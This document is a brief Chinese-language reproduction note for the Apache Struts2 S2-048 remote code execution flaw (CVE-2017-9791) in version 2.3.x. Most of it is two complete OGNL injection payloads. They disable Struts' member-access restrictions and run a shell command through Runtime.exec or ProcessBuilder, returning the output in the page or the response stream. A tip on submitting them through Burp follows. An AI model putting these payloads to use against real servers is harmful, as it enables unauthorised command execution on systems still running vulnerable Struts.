# （CVE-2017-9791）s2-048

## 一、漏洞简介

当实用了Struts2 Struts1 插件时，可能导致不受信任的输入传入到ActionMessage类种导致命令执行

## 二、漏洞影响

2.3.x

## 三、复现过程

## POC

![1.png](images/4dd1c2e7539c43ee8d37e710cbc54c35.png)

![2.png](images/237c6c9d04cc4743ae845f0228764df7.png)

**回显 在正常页面里**

```java
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

```

![3.png](images/bdaa75d563164093b75e1507a0bfd8a6.png)



burp里改 浏览器里填就500

**光有回显**

```java
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

```

![4.png](images/4d0082833dbd4b41abfd2d06fc8ec50e.png)